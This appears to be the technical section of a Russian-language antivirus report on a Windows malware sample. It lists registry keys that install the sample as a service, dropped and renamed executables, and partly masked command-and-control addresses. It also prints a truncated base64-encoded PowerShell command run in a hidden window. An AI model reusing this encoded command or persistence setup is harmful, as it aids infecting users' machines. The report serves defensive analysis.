Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\odbccu32] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\odbccu32] 'ImagePath' = '"%WINDIR%\SysWOW64\d3dx9_25\odbccu32.exe"'
- 'odbccu32' "%WINDIR%\SysWOW64\d3dx9_25\odbccu32.exe"
- 'odbccu32' %WINDIR%\SysWOW64\d3dx9_25\odbccu32.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\y85mi4vtd.exe
- %WINDIR%\syswow64\d3dx9_25\odbccu32.exe
- %TEMP%\word\2019\y85mi4vtd.exe в %WINDIR%\syswow64\d3dx9_25\odbccu32.exe
- '67.##.210.95':80
- '16#.#41.242.173':8080
- http://qs##ide.com/img/0/
- http://16#.###.242.173:8080/cN10GSUUMooLyJ7Gvv/rNhKs9NkAxYgqt5E/5AGMN7RYB/OEEDd/9NvtgvcTCv/ via 16#.#41.242.173
- DNS ASK qs##ide.com
- '%TEMP%\word\2019\y85mi4vtd.exe'
- '%WINDIR%\syswow64\d3dx9_25\odbccu32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)